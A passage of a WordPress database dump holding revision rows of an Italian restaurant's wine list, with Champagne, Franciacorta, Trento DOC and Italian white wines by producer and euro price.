9,00\r\n\r\n&nbsp;\r\n\r\n<strong>       </strong>\r\n\r\n<strong>Frizzanti</strong>\r\n\r\n<strong> </strong>\r\n\r\nAdami                              Prosecco D.O.C.                                                               € 10,00\r\n\r\nIl Mosnel                          Franciacorta Brut D.O.C.G.                                          € 16,00\r\n\r\nLaherte Freres             Champagne Brut Tradition                                         € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>Rossi</strong>\r\n\r\n<strong> </strong>\r\n\r\nSan Patrignano           Aulente Rosso                                                                   € 9,00','I PICCOLI FORMATI DA 0,375','','inherit','closed','closed','','977-revision-v1','','','2020-06-10 14:40:08','2020-06-10 12:40:08','',977,'https://www.ristorantesolymar.it/2020/06/10/977-revision-v1/',0,'revision','',0),(981,2,'2020-06-10 14:51:25','2020-06-10 12:51:25','<u>            SOL Y MAR</u>\r\n\r\n<u> </u>\r\n<p style=\"text-align: center\"><strong><u>I PICCOLI FORMATI DA 0,375 </u></strong></p>\r\n<u> </u>\r\n\r\n<u> </u>\r\n<p style=\"text-align: center\"><u>0,375</u></p>\r\n<u> </u>\r\n<p style=\"text-align: center\"><strong>Fermi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano              Aulente Bianco                                 € 9,00\r\n\r\nDonnafugata                    Anthilia I.G.T.                                € 9,00\r\n\r\nUmani Ronchi             Verdicchio Casal Di Serra                   € 9,00\r\n\r\n&nbsp;\r\n\r\n<strong>       </strong>\r\n<p style=\"text-align: center\"><strong>Frizzanti</strong></p>\r\n<strong> </strong>\r\n\r\nAdami                              Prosecco D.O.C.                       € 10,00\r\n\r\nIl Mosnel                          Franciacorta Brut D.O.C.G.            € 16,00\r\n\r\nLaherte Freres             Champagne Brut Tradition                € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Rossi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano           Aulente Rosso                                          € 9,00','Le mille e una bollicina','','inherit','closed','closed','','73-revision-v1','','','2020-06-10 14:51:25','2020-06-10 12:51:25','',73,'https://www.ristorantesolymar.it/2020/06/10/73-revision-v1/',0,'revision','',0),(982,2,'2020-06-10 14:51:53','2020-06-10 12:51:53','<u>            SOL Y MAR</u>\r\n\r\n<u> </u>\r\n<p style=\"text-align: center\"><strong><u>I PICCOLI FORMATI DA 0,375 </u></strong></p>\r\n<u> </u>\r\n\r\n<u> </u>\r\n<p style=\"text-align: center\"><u>0,375</u></p>\r\n<u> </u>\r\n<p style=\"text-align: center\"><strong>Fermi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano              Aulente Bianco                                 € 9,00\r\n\r\nDonnafugata                    Anthilia I.G.T.                                € 9,00\r\n\r\nUmani Ronchi             Verdicchio Casal Di Serra                   € 9,00\r\n\r\n&nbsp;\r\n\r\n<strong>       </strong>\r\n<p style=\"text-align: center\"><strong>Frizzanti</strong></p>\r\n<strong> </strong>\r\n\r\nAdami                              Prosecco D.O.C.                       € 10,00\r\n\r\nIl Mosnel                          Franciacorta Brut D.O.C.G.            € 16,00\r\n\r\nLaherte Freres             Champagne Brut Tradition                € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Rossi</strong></p>\r\n<strong> </strong>\r\n\r\nSan Patrignano           Aulente Rosso                                          € 9,00','I piccoli formati da 0.375','','inherit','closed','closed','','73-revision-v1','','','2020-06-10 14:51:53','2020-06-10 12:51:53','',73,'https://www.ristorantesolymar.it/2020/06/10/73-revision-v1/',0,'revision','',0),(983,2,'2020-06-10 14:53:18','2020-06-10 12:53:18','LE MILLE E UNA BOLLICINA\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Italia………………………………………………………………………………</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Valle D’Aosta</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCave de Morgex        Glacier Extra Brut D.O.C. Valle d’Aosta                €30,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Piemonte</u></strong>\r\n\r\n&nbsp;\r\n\r\nCoppo                         Luigi Coppo Brut                                                          €25,00\r\n\r\nEttore Germano         Alta Langa brut D.O.C.                                                  30,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCantine Montagna                 Pinot nero v.i.b. Oltrepò Pavese D.O.C.                  €15,00\r\n\r\nCà dei Frati                    Rosè cuveè dei Frati metodo classico            (NO)     € 25,00\r\n\r\nCà del Vént                 Brut Rosè Pas Operè millesimo                 (NO)     € 42,00\r\n\r\nCà del Vént                 Blanc de Blancs Pas Operé millesimo                     € 60,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Trentino - Alto Adige</u></strong>\r\n\r\n&nbsp;\r\n\r\nRevì                             Trento D.O.C. Dosaggio Zero                                        € 28,00\r\n\r\nTrento D.O.C. Rosè                                                         € 28,00\r\n\r\nPojer e Sandri           Brut Rosè                                                                            € 30,00\r\n\r\nBalter                               Trento D.O.C. Brut Chardonnay                                 € 23,00\r\n\r\nLetrari (Talento)           Trento D.O.C. Brut                                                     € 25,00\r\n\r\nTrento D.O.C. dosaggio zero riserva                         € 30,00\r\n\r\nFerrari                             Perlè Trento D.O.C Brut                                          € 40,00\r\n\r\nGiulio Ferrari               Riserva del fondatore Trento D.O.C. Extra Brut     € 85,00\r\n\r\nPedrotti                      Trento D.O.C. Brut Millesimato                                      € 30,00\r\n\r\nTrento D.O.C. Bouquet Brut Nature                                € 27,00\r\n\r\nTrento D.O.C. Brut Riserva 12 anni                             € 70,00\r\n\r\nCantina Furlani         Furlani Brut                                                                     € 21,00\r\n\r\nCantina Furlani         Furlani Brut Nature                                             € 22,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Veneto</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nAdami                         Prosecco Valdob. D.O.C.G. Brut Bosco di Giga         € 17,00\r\n\r\nCartizze Valdobbiadene superiore D.O.C.G.    (NO) € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Francia Champagne','','inherit','closed','closed','','75-revision-v1','','','2020-06-10 14:53:18','2020-06-10 12:53:18','',75,'https://www.ristorantesolymar.it/2020/06/10/75-revision-v1/',0,'revision','',0),(984,2,'2020-06-10 14:53:35','2020-06-10 12:53:35','LE MILLE E UNA BOLLICINA\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Italia………………………………………………………………………………</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Valle D’Aosta</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCave de Morgex        Glacier Extra Brut D.O.C. Valle d’Aosta                €30,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Piemonte</u></strong>\r\n\r\n&nbsp;\r\n\r\nCoppo                         Luigi Coppo Brut                                                          €25,00\r\n\r\nEttore Germano         Alta Langa brut D.O.C.                                                  30,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCantine Montagna                 Pinot nero v.i.b. Oltrepò Pavese D.O.C.                  €15,00\r\n\r\nCà dei Frati                    Rosè cuveè dei Frati metodo classico            (NO)     € 25,00\r\n\r\nCà del Vént                 Brut Rosè Pas Operè millesimo                 (NO)     € 42,00\r\n\r\nCà del Vént                 Blanc de Blancs Pas Operé millesimo                     € 60,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Trentino - Alto Adige</u></strong>\r\n\r\n&nbsp;\r\n\r\nRevì                             Trento D.O.C. Dosaggio Zero                                        € 28,00\r\n\r\nTrento D.O.C. Rosè                                                         € 28,00\r\n\r\nPojer e Sandri           Brut Rosè                                                                            € 30,00\r\n\r\nBalter                               Trento D.O.C. Brut Chardonnay                                 € 23,00\r\n\r\nLetrari (Talento)           Trento D.O.C. Brut                                                     € 25,00\r\n\r\nTrento D.O.C. dosaggio zero riserva                         € 30,00\r\n\r\nFerrari                             Perlè Trento D.O.C Brut                                          € 40,00\r\n\r\nGiulio Ferrari               Riserva del fondatore Trento D.O.C. Extra Brut     € 85,00\r\n\r\nPedrotti                      Trento D.O.C. Brut Millesimato                                      € 30,00\r\n\r\nTrento D.O.C. Bouquet Brut Nature                                € 27,00\r\n\r\nTrento D.O.C. Brut Riserva 12 anni                             € 70,00\r\n\r\nCantina Furlani         Furlani Brut                                                                     € 21,00\r\n\r\nCantina Furlani         Furlani Brut Nature                                             € 22,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Veneto</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nAdami                         Prosecco Valdob. D.O.C.G. Brut Bosco di Giga         € 17,00\r\n\r\nCartizze Valdobbiadene superiore D.O.C.G.    (NO) € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','LE MILLE E UNA BOLLICINA','','inherit','closed','closed','','75-revision-v1','','','2020-06-10 14:53:35','2020-06-10 12:53:35','',75,'https://www.ristorantesolymar.it/2020/06/10/75-revision-v1/',0,'revision','',0),(985,2,'2020-06-10 14:58:57','2020-06-10 12:58:57','<u>     SOL Y MAR   </u>\r\n\r\n<u> </u>\r\n\r\n<strong>LE MILLE E UNA BOLLICINA</strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong><u>     Italia………………………………………………………………………………</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Emilia Romagna</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\nPodere il Saliceto       Ringadora Brut Nature Metodo classico                    € 24,00\r\n\r\n(lambrusco)\r\n\r\nBon Luigi                   Belmount Pas dosè                                                           € 27,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Toscana</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nTunia                      Sottofondo I.G.T. Toscana Bianco frizzante               € 21,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Marche</u></strong>\r\n\r\n&nbsp;\r\n\r\nMarotti Campi        Brut Rosè                                                                               € 17,00\r\n\r\nCollestefano             Verdicchio di matelica Extra Brut                  (NO)     € 22,00\r\n\r\nValturio                      1759 Extra Brut Rose                                            € 29,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Campania </u></strong>\r\n\r\n<strong><u>  </u></strong>\r\n\r\nCiro Picariello         Spumante metodo classico Brut Contadino  € 27,00','Franciacorta','','inherit','closed','closed','','71-revision-v1','','','2020-06-10 14:58:57','2020-06-10 12:58:57','',71,'https://www.ristorantesolymar.it/2020/06/10/71-revision-v1/',0,'revision','',0),(986,2,'2020-06-10 15:01:22','2020-06-10 13:01:22','<u>     SOL Y MAR   </u>\r\n\r\n<u> </u>\r\n\r\n<strong>LE MILLE E UNA BOLLICINA</strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong><u>     Italia………………………………………………………………………………</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Emilia Romagna</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\nPodere il Saliceto       Ringadora Brut Nature Metodo classico                    € 24,00\r\n\r\n(lambrusco)\r\n\r\nBon Luigi                   Belmount Pas dosè                                                           € 27,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Toscana</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nTunia                      Sottofondo I.G.T. Toscana Bianco frizzante               € 21,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Marche</u></strong>\r\n\r\n&nbsp;\r\n\r\nMarotti Campi        Brut Rosè                                                                               € 17,00\r\n\r\nCollestefano             Verdicchio di matelica Extra Brut                  (NO)     € 22,00\r\n\r\nValturio                      1759 Extra Brut Rose                                            € 29,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Campania </u></strong>\r\n\r\n<strong><u>  </u></strong>\r\n\r\nCiro Picariello         Spumante metodo classico Brut Contadino  € 27,00','Le mille e una bollicina','','inherit','closed','closed','','71-revision-v1','','','2020-06-10 15:01:22','2020-06-10 13:01:22','',71,'https://www.ristorantesolymar.it/2020/06/10/71-revision-v1/',0,'revision','',0),(987,2,'2020-06-10 15:02:12','2020-06-10 13:02:12','LE MILLE E UNA BOLLICINA\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Italia………………………………………………………………………………</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Valle D’Aosta</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCave de Morgex        Glacier Extra Brut D.O.C. Valle d’Aosta                €30,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Piemonte</u></strong>\r\n\r\n&nbsp;\r\n\r\nCoppo                         Luigi Coppo Brut                                                          €25,00\r\n\r\nEttore Germano         Alta Langa brut D.O.C.                                                  30,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCantine Montagna                 Pinot nero v.i.b. Oltrepò Pavese D.O.C.                  €15,00\r\n\r\nCà dei Frati                    Rosè cuveè dei Frati metodo classico            (NO)     € 25,00\r\n\r\nCà del Vént                 Brut Rosè Pas Operè millesimo                 (NO)     € 42,00\r\n\r\nCà del Vént                 Blanc de Blancs Pas Operé millesimo                     € 60,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Trentino - Alto Adige</u></strong>\r\n\r\n&nbsp;\r\n\r\nRevì                             Trento D.O.C. Dosaggio Zero                                        € 28,00\r\n\r\nTrento D.O.C. Rosè                                                         € 28,00\r\n\r\nPojer e Sandri           Brut Rosè                                                                            € 30,00\r\n\r\nBalter                               Trento D.O.C. Brut Chardonnay                                 € 23,00\r\n\r\nLetrari (Talento)           Trento D.O.C. Brut                                                     € 25,00\r\n\r\nTrento D.O.C. dosaggio zero riserva                         € 30,00\r\n\r\nFerrari                             Perlè Trento D.O.C Brut                                          € 40,00\r\n\r\nGiulio Ferrari               Riserva del fondatore Trento D.O.C. Extra Brut     € 85,00\r\n\r\nPedrotti                      Trento D.O.C. Brut Millesimato                                      € 30,00\r\n\r\nTrento D.O.C. Bouquet Brut Nature                                € 27,00\r\n\r\nTrento D.O.C. Brut Riserva 12 anni                             € 70,00\r\n\r\nCantina Furlani         Furlani Brut                                                                     € 21,00\r\n\r\nCantina Furlani         Furlani Brut Nature                                             € 22,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Veneto</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nAdami                         Prosecco Valdob. D.O.C.G. Brut Bosco di Giga         € 17,00\r\n\r\nCartizze Valdobbiadene superiore D.O.C.G.    (NO) € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Le mille e una bollicina','','inherit','closed','closed','','75-revision-v1','','','2020-06-10 15:02:12','2020-06-10 13:02:12','',75,'https://www.ristorantesolymar.it/2020/06/10/75-revision-v1/',0,'revision','',0),(988,2,'2020-06-10 15:03:28','2020-06-10 13:03:28','<strong>  </strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Franciacorta</strong>\r\n\r\n<strong> </strong>\r\n\r\nCà del Bosco       Cuvee Prestige Brut D.O.C.G.                       (NO)           € 45,00\r\n\r\n&nbsp;\r\n\r\nFaccoli                 Brut D.O.C.G                                                                        € 30,00\r\n\r\nDosaggio zero millesimo D.O.C.G                          € 38,00\r\n\r\nRose brut D.O.C.G                                                                     € 30,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMajolini<strong>                      </strong>Satèn millesimato D.O.C.G                                               € 30,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMonterossa        P.R. Brut blanc de blancs                             (NO)          €32,00\r\n\r\nCabochon Brut millesimo                                               €65,00\r\n\r\n&nbsp;\r\n\r\nIl Mosnel              Extra Brut millesimato D.O.C.G                                      € 38,00\r\n\r\nPas dosè D.O.C.G                                                                  € 27,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nVilla                    Brut rosé millesimato D.O.C.G                                          € 32,00\r\n\r\nSaten millesimato D.O.C.G                                              € 30,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Sud Africa…………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nPongracz               Metodo classico brut da chardonnay e pinot nero       € 25,00\r\n\r\n&nbsp;','Franciacorta','','inherit','closed','closed','','77-revision-v1','','','2020-06-10 15:03:28','2020-06-10 13:03:28','',77,'https://www.ristorantesolymar.it/2020/06/10/77-revision-v1/',0,'revision','',0),(989,2,'2020-06-10 15:03:51','2020-06-10 13:03:51','<strong>  </strong>\r\n\r\n&nbsp;\r\n\r\n<strong>Franciacorta</strong>\r\n\r\n<strong> </strong>\r\n\r\nCà del Bosco       Cuvee Prestige Brut D.O.C.G.                                  € 45,00\r\n\r\n&nbsp;\r\n\r\nFaccoli                 Brut D.O.C.G                                                                        € 30,00\r\n\r\nDosaggio zero millesimo D.O.C.G                          € 38,00\r\n\r\nRose brut D.O.C.G                                                                     € 30,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMajolini<strong>                      </strong>Satèn millesimato D.O.C.G                                               € 30,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMonterossa        P.R. Brut blanc de blancs                             (NO)          €32,00\r\n\r\nCabochon Brut millesimo                                               €65,00\r\n\r\n&nbsp;\r\n\r\nIl Mosnel              Extra Brut millesimato D.O.C.G                                      € 38,00\r\n\r\nPas dosè D.O.C.G                                                                  € 27,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nVilla                    Brut rosé millesimato D.O.C.G                                          € 32,00\r\n\r\nSaten millesimato D.O.C.G                                              € 30,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Sud Africa…………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nPongracz               Metodo classico brut da chardonnay e pinot nero       € 25,00\r\n\r\n&nbsp;','Franciacorta','','inherit','closed','closed','','77-revision-v1','','','2020-06-10 15:03:51','2020-06-10 13:03:51','',77,'https://www.ristorantesolymar.it/2020/06/10/77-revision-v1/',0,'revision','',0),(990,2,'2020-06-10 15:05:29','2020-06-10 13:05:29','<strong><u> </u></strong>\r\n\r\n<strong><u>   Francia Champagne….…………………………………………………………..</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong>   I blanc de blancs</strong>\r\n\r\n<strong> </strong>\r\n\r\n&nbsp;\r\n\r\nAgrapart &amp; fils           Terroirs Ex. Brut Grand Cru Avize                    € 80,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nUlysse Collin                       Les Pierrieres Extra Brut rm Congy                        € 90,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPascal Doquet                       Brut   Diapason     Mesnil sur Oger                            € 62,00\r\n\r\nBrut grand cru  Mesnil sur Oger                               € 85,00\r\n\r\n&nbsp;\r\n\r\nBonnet Gilmert         Cuvee de reserve Brut Grand Cru Oger                € 45,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPierre Gimonnet        Cuvee 1er cru brut Cuis                                          € 42,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nDavid Léclapart          L’artiste pas dose 1er cru (biod.) Trépail                       € 105,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nR &amp; L Legras              Brut Grand Crù Chouilly                                       € 50,00\r\n\r\nSaint Vincent Grand cru Mill Chouilly                  € 120,00\r\n\r\n&nbsp;\r\n\r\nDiebolt Vallois           Brut Mill   Cramant                           “11                 € 60,00\r\n\r\nFleur de Passion Brut Cramant         “07                 € 120,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\nVouette &amp; Sorbée      Blanc d’Argile Extra Brut Buxieres sur Arce            € 80,00','Francia Champagne Blanc de blancs','','inherit','closed','closed','','79-revision-v1','','','2020-06-10 15:05:29','2020-06-10 13:05:29','',79,'https://www.ristorantesolymar.it/2020/06/10/79-revision-v1/',0,'revision','',0),(991,2,'2020-06-10 15:06:23','2020-06-10 13:06:23','&nbsp;\r\n\r\n<strong>   I blanc de noir</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nBereche et fils       Rive Gauche ext. Brut 100% meunier Mareuil-le-port     € 75,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nNathalie Falmet     Le Val Cornet brut Rouvres les Vignes                                        € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nFleury Pere &amp; Fils Brut nm (biologico) Courteron                          (NO)           € 50,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nEgly-Ouriet     “Les Vignes de Vrigny”Brut 1er cru (100%meunier)rm          € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nJéròme Prévost       La Closerie Extra Brut Gueux                                 € 75,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nUlysse Collin           Les Maillon Extra Brut rm Congy                                € 100,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nCote de Val Vilaine   Bdn Brut Cedric Bouchard                                           € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>     Alain Couvrer          Brut Propriétaire récoltante à Prouillly                     € 45,00                                             </strong>\r\n\r\n<strong>   </strong>\r\n\r\n&nbsp;','Blanc de Noir','','inherit','closed','closed','','81-revision-v1','','','2020-06-10 15:06:23','2020-06-10 13:06:23','',81,'https://www.ristorantesolymar.it/2020/06/10/81-revision-v1/',0,'revision','',0),(992,2,'2020-06-10 15:07:20','2020-06-10 13:07:20','<strong>     Assemblaggi</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nAgrapart &amp; fils       7 crus Brut     Avize                                                 € 70,00\r\n\r\n&nbsp;\r\n\r\nL.Aubry Fils              Aubry 1er cru. Brut rm Jouy-les-Reims                     € 50,00\r\n\r\nCuvée de Humbert P.C. Brut “ Jouy-les-Reims        € 70,00\r\n\r\n&nbsp;\r\n\r\nBereche et fils         Brut reserve Craon de Ludes                                     € 50,00                                                                      Reflet d’Antan Brut Craon de Ludes                       € 90,00\r\n\r\n&nbsp;\r\n\r\nEmmanuel Brochet Le Mont Benoit Extra Brut Ville-aux-Noeuds        € 70,00\r\n\r\n&nbsp;\r\n\r\nRoger Brun             Brut Reserve à Ay                                                                     € 42,00\r\n\r\n&nbsp;\r\n\r\nCorbon                     Brut Prestige rm   Avize                                               € 56,00\r\n\r\n&nbsp;\r\n\r\nLaherte Frères         Ultradition Brut Epernay   0,375 ml                      € 25,00\r\n\r\nUltradition Brut Epernay   0,750 ml                     € 50,00\r\n\r\n&nbsp;\r\n\r\n<strong>                         </strong>\r\n\r\nJaquesson &amp;fils      Cuvee Brut Dizy 742                                             € 63,00\r\n\r\n&nbsp;\r\n\r\nBenoït Lahaye         Brut Naturessense rm     Bouzy                                 € 65,00\r\n\r\nViolaine (senza solforosa aggiunta) Bouzy               € 90,00\r\n\r\n&nbsp;\r\n\r\nGeorges Laval        Garennes 1er cru Cumieres                                       € 68,00\r\n\r\n&nbsp;\r\n\r\nMarie-Noelle Ledru Brut Grand.Cru Ambonnay                              € 63,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nEgly-Ouriet              Brut Tradition Grand Cru rm Ambonnay               € 90,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nFranck Pascal           Reliance Brut nature (biologico,biodinamico)\r\n\r\nBaslieux                                                                   € 60,00\r\n\r\n&nbsp;\r\n\r\nLaurent-Perrier       Ultra Brut Nature Tours Sur Marne                         € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Assemblaggi','','inherit','closed','closed','','102-revision-v1','','','2020-06-10 15:07:20','2020-06-10 13:07:20','',102,'https://www.ristorantesolymar.it/2020/06/10/102-revision-v1/',0,'revision','',0),(993,2,'2020-06-10 15:14:48','2020-06-10 13:14:48','<strong> </strong>\r\n\r\n<strong>   Assemblaggi</strong>\r\n\r\n<strong> </strong>\r\n\r\n&nbsp;\r\n\r\nPhilipponnat          Royale Reserve non dose Mareuil-sur-Ay                   € 55,00\r\n\r\n&nbsp;\r\n\r\nMoet et Chandon   Dom Perignon Vintage Epernay                     “06         € 150,00\r\n\r\n&nbsp;\r\n\r\nKrug                       Grande Cuveè                                               (NO)       € 160,00\r\n\r\n&nbsp;\r\n\r\nMarguet                 Shaman 14 Grand Cru (biodinamico)                              € 58,00\r\n\r\n&nbsp;\r\n\r\nPierre Gerbais           Grains de Celle Extra Brut                                             € 45,00\r\n\r\n&nbsp;\r\n\r\nJean Paul Deville     Carte Noir Brut Verzy                                                  € 39,00\r\n\r\n&nbsp;\r\n\r\n<strong> </strong>\r\n\r\n<strong>   I Rosè</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLamiable                  Brut rosé grand cru                                                    € 47,00\r\n\r\n&nbsp;\r\n\r\nPascal Doquet           Brut 1°ers cru Mesnil sur Oger                               € 62,00\r\n\r\n<strong><u> </u></strong>\r\n\r\nLaurent-Perrier       Cuvée Rosé Tours Sur Marne                               € 70,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Assemblaggi','','inherit','closed','closed','','81-revision-v1','','','2020-06-10 15:14:48','2020-06-10 13:14:48','',81,'https://www.ristorantesolymar.it/2020/06/10/81-revision-v1/',0,'revision','',0),(994,2,'2020-06-10 15:16:11','2020-06-10 13:16:11','<u>     SOL Y MAR</u>\r\n\r\n<u> </u>\r\n\r\n<u>I VINI BIANCHI ITALIANI</u>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\n<strong><u>   Emilia Romagna………………………………………………………………….</u></strong>\r\n\r\n&nbsp;\r\n\r\nAncarani                      Famoso Ravenna I.G.T.                                     “17   € 15,00\r\n\r\nTenuta La Palazza    Tornese Chardonnay I.G.T.                                “17  € 19,00\r\n\r\nPoderi del Nespoli     Pagadebit di Romagna D.O.C.                               “17 € 14,00\r\n\r\nTre Monti                       Ciardo Chardonnay colli di Imola D.O.C.           “17 € 18,00\r\n\r\nSono Chardonnay senza solfiti I.G.P.          (NO) “18 € 17,00\r\n\r\nFattoria Vallona         Ammestesso Pignoletto colli bolognesi D.O.C.   “10 € 21,00\r\n\r\n&nbsp;\r\n\r\nSan Patrignano            Aulente I.G.T.                                                   (NO   “18 € 16,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Valle d’Aosta…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLes Cretes                  Chardonnay Cuvèe Bois D.O.C.                                “15 € 42,00\r\n\r\n&nbsp;\r\n\r\nPavese Ermes           Blanc de Morgex et de la Salle D.O.P.                         “16 € 22,00','I vini bianchi italiani','','inherit','closed','closed','','104-revision-v1','','','2020-06-10 15:16:11','2020-06-10 13:16:11','',104,'https://www.ristorantesolymar.it/2020/06/10/104-revision-v1/',0,'revision','',0),(995,2,'2020-06-10 15:17:12','2020-06-10 13:17:12','<u>   SOL Y MAR</u>\r\n\r\n<u> </u>\r\n\r\n<u> </u>\r\n\r\n<strong><u>   Piemonte………………………………………………………………….</u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nGaja                         Rossj-Bass Chardonnay               (NO)        “17   € 60,00\r\n\r\nEttore Germano     Hèrzu Langhe Bianco doc Riesling          “17  € 24,00\r\n\r\nCeretto                    Blangè Arneis D.O.C.                                    “17 € 23,00\r\n\r\nCoppo                      Monteriolo Chardonnay D.O.C.                “15 € 34,00\r\n\r\nMonte Maletto       Erbaluce di Caluso D.O.C.G.                     “16 € 30,00\r\n\r\nAzienda Agricola Ghiomo   Ghiomo Imprimis                         “17 € 19,00\r\n\r\nBellotti Bianco       Semplicemente Vino                                   “18 € 18,00\r\n\r\nVigneti Massa         Derthona                                                     “17 € 24,00\r\n\r\n<strong><u>   Liguria…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\nStefano Legnani       Bamboo Road bianco non filtrato      “16   € 20,00\r\n\r\n&nbsp;\r\n\r\nStefano Legnani      Ponte di Toi bianco non filtrato             “16   € 